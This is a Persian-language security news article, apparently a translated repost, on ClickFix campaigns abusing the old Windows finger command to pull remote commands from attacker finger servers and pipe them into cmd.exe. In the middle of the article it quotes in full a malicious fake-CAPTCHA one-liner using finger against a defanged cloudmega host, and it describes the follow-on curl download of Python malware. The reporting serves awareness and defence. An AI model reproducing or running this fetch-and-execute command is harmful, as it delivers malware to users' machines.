پروتکل «انگشت» با قدمت چند دهه در حملات بدافزار ClickFix مورد سوءاستفاده قرار گرفت

 


دستور «انگشت» که قدمتی چند دهه‌ای دارد، دوباره در حال بازگشت است و مهاجمان از این پروتکل برای بازیابی دستورات از راه دور و اجرای آنها در دستگاه‌های ویندوز استفاده می‌کنند.


در گذشته، مردم از دستور انگشت برای جستجوی اطلاعات مربوط به کاربران محلی و راه دور در سیستم‌های یونیکس و لینوکس از طریق پروتکل انگشت استفاده می‌کردند، دستوری که بعداً به ویندوز اضافه شد. اگرچه هنوز پشتیبانی می‌شود، اما امروزه در مقایسه با محبوبیت آن در دهه‌های گذشته، به ندرت مورد استفاده قرار می‌گیرد.


هنگام اجرا، دستور انگشت اطلاعات اولیه در مورد یک کاربر، از جمله نام کاربری، نام (در صورت تنظیم در /etc/passwd)، فهرست خانه، شماره تلفن‌ها، آخرین بازدید و سایر جزئیات را برمی‌گرداند.


اخیراً، کمپین‌های مخربی وجود داشته‌اند که از پروتکل انگشت در حملاتی که به نظر می‌رسد ClickFix باشند، استفاده می‌کنند و دستوراتی را برای اجرا در دستگاه‌ها بازیابی می‌کنند.


این اولین باری نیست که دستور انگشت به این روش مورد سوءاستفاده قرار می‌گیرد، زیرا محققان در سال ۲۰۲۰ هشدار دادند که از آن به عنوان یک LOLBIN برای دانلود بدافزار و فرار از شناسایی استفاده شده است.


سوءاستفاده از دستور finger

ماه گذشته، MalwareHunterTeam، محقق امنیت سایبری، یک فایل دسته‌ای [VirusTotal] را با BleepingComputer به اشتراک گذاشت که هنگام اجرا، از دستور "finger root@finger.nateams[.]com" برای بازیابی دستورات از یک سرور finger از راه دور استفاده می‌کرد، که سپس با اتصال آنها به cmd.exe به صورت محلی اجرا می‌شدند.


به عنوان مثال، شخصی در Reddit اخیراً هشدار داد که قربانی حمله ClickFix شده است که یک Captcha را جعل کرده و از او خواسته است تا یک دستور ویندوز را برای تأیید انسان بودن خود اجرا کند.


در پست Reddit آمده است: "من فقط عاشق verify you are human win + r شدم. چه کار کنم؟"


من عجله داشتم و در نهایت در cmd prompt خود عبارت زیر را وارد کردم:"


"cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' تأیید کنید که انسان هستید - ENTER را فشار دهید.


اگرچه میزبان دیگر به درخواست‌های finger پاسخ نمی‌دهد، یکی دیگر از کاربران Reddit خروجی را ضبط کرد.


این حمله با اجرای finger vke@finger.cloudmega[.]org و ارسال خروجی آن از طریق پردازنده فرمان ویندوز، cmd.exe، از پروتکل Finger به عنوان یک روش تحویل اسکریپت از راه دور سوءاستفاده می‌کند.


این باعث می‌شود دستورات بازیابی شده اجرا شوند که یک مسیر با نام تصادفی ایجاد می‌کند، curl.exe را در یک نام فایل تصادفی کپی می‌کند، از فایل اجرایی curl که تغییر نام داده شده است برای دانلود یک آرشیو زیپ که به عنوان PDF [VirusTotal] از cloudmega[.]org پنهان شده است استفاده می‌کند و یک بسته بدافزار پایتون را استخراج می‌کند.

منبع

Comments

Popular posts from this blog

معرفی سایت خبری نیو نیوز 1

معرفی سایت خبری خبر نسیم

معرفی سایت خبری نیوز آبی